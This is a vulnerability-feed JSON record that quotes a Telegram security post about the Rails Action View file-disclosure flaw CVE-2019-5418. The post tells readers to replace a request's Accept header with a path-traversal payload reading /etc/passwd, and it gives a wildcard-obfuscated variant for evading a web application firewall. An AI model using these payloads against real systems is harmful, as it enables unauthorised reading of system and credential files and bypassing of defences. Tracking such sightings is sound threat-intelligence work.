{"uuid": "e9b3af1c-0195-46ae-b5d2-df1870cff3e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://t.me/brutsecurity/1373", "content": "\u26a0\ufe0fIf your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.\n\nIntercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{ \n\n\ud83d\udecdIf the server is deemed to be vulnerable, but a WAF is present: \n\n../../../../../../e*c/p*s*d{{\n\n\u2714\ufe0fCredit- nav1n0x", "creation_timestamp": "2026-07-10T00:00:33.888181Z"}